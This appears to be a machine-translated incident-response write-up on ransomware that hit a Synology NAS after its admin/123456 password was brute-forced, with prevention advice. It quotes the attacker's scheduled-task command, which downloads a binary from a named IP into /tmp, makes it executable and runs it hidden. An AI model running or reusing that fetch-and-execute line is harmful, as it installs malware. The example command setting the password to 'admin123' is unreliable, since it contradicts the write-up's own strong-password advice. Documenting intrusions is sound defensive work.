preface
As a NAS (network Attached storage) system, Qunhui mainly plays the role of personal private cloud in daily life. Files can be stored and shared in NAS, and can be stored and shared through web browsers or mobile applications. It also provides rich applications for easy application management. With Qunhui’s QuickConnect service, you can access NAS anytime and anywhere without carrying a storage device. Because of these advantages, cluster hui is often regarded as the first choice for NAS.
But it happened to be on the ransomware this time, through data query found that the virus as early as 2019 security experts have been analyzed and have provided early warning information, once infected, the files will be encrypted, and through the files left to demand bitcoin. It was preliminarily determined that the user entered through the weak password on the Web interface, and then created a scheduled task to download files from an IP address in the United States to execute the command. Besides, the file was encrypted through the ransomware, and no lateral action of the virus was found for the time being. This paper mainly records the emergency response process after the ransomware in Qunhui.
[Network security data acquisition]
First, the attack process
(1) Obtaining attack targets
The destination address ishttp://x.x.x.x:5000According to the data, the default ports for querying cluster hui are 5000 and 5001, so the hacker should detect the 5000 and 5001 ports of the IP address on the public network through batch scanning. If the detected cluster hui system is detected, the result will be recorded and saved
(2) Blasting with weak password
The default management account admin of the target site was exploded by the tool, and the system was exploded by admin/123456. Moreover, the hacker adopted the way of dynamically switching the proxy IP to improve the difficulty of tracing the source.
(3) Planting ransomware
After logging in as admin, the ransomware was implanted, the hard disk data was encrypted (the file type was ENCRYPT), and the bitcoin payment address was left.
Second, emergency procedures
The DSM of the target QUNhui system version is 6.2.3-25426, and the CPU is INTEL Celeron J3455. There is no known vulnerability on the public network, and the target can be directly accessed.
(1) Change the password
If you know the source of the intrusion, change the weak password to prevent hackers from using the weak password again. You can change the password through the Web system interface or the server
(1) Directly change the password
To change a password to a strong password, it is best to enable 2-step authentication to improve security
(2) Modify it on the server
1. Enable port 22 on the web UI
2. Use SSH to log in to the admin account of target Group hui (admin is the default account of group Hui) 3
sudo su -
Copy the code4. Enter the following command to change the password to admin123
synouser --setpw admin admin123
Copy the code(2) Log analysis
According to the feedback of the victim company, they found that the files were encrypted on July 29 and did not seek technical help until August 3. Then, through the log center of Qunhui, it could be found that someone from 83.97.20.103 logged in to the admin account at 11:19 PM on July 28
Of course, tracing to this IP is not useful, because it is overseas and has been marked as a proxy, scan address
Log query also found that the attacker created a scheduled task at 19:00 on July 28
Run the following command: go to/TMP, download the crp_linux_386 file, grant 777 permission and output it as 386. Run the 386 program permanently through nohub without output any information to the terminal
CD/TMP && wget - no - check - certificate - O 386 http://98.144.56.47/1/crp_linux_386; chmod 0777 ./386; nohub ./386 --syno=true </dev/null> /dev/null 2>&1 &Copy the codeWhen 98.144.56.47 is queried on microstep, it is found that it has been identified as a ransomware program, and the hope of data decryption is very slim
(3) Virus detection and elimination
First, delete the 386 file in TMP directory (but the original virus is not saved, so it is a pity that the virus cannot be analyzed in detail). Then, use the Antivirus Essential plug-in provided by Cluster Hui to check whether there is a virus in cluster Hui
(1) Download Antivirus Essential
(2) Comprehensive scanning
(3) Isolate the virus
(4) Data decryption
This is very interesting. After the interview on the first day, the boss went to taobao shop to crack. At first, I thought taobao shop was really so good that the encrypted data could be cracked.
Copy an encrypted file and try to decrypt it through the downloaded decryption program. The decryption process is as follows:
.\decryptor_windows_x86.exe -s C:\test\
Copy the code
Three, prevention methods
1. Disable the default admin account, create a different account, and assign management rights to it
2, put an end to weak password, set a strong password, can refer to the length of more than eight digits in the protection requirements, composed of numbers, letters, special characters
3. Change the default login port. You can change the default login port
4. Enable the lock function for IP addresses that fail to be logged in to multiple times
5. Install security tools (security consultants), update patches and upgrade versions regularly
6. Enable the firewall and configure access rules
7, file version rollback, can easily restore the file to the state before infection, can effectively prevent the file cannot be accessed because of ransomware infection
8, file permission control, in the sharing of files to set access password, period of validity, and file permission control
[Network security data acquisition]
Four,
This is the first time for me to do emergency response work. I may know little about the swarm brightness system or ransomware, so it is inevitable that THERE will be some unclear explanations or insufficient cognition. If you guys have other ideas, feel free to leave them in the comments.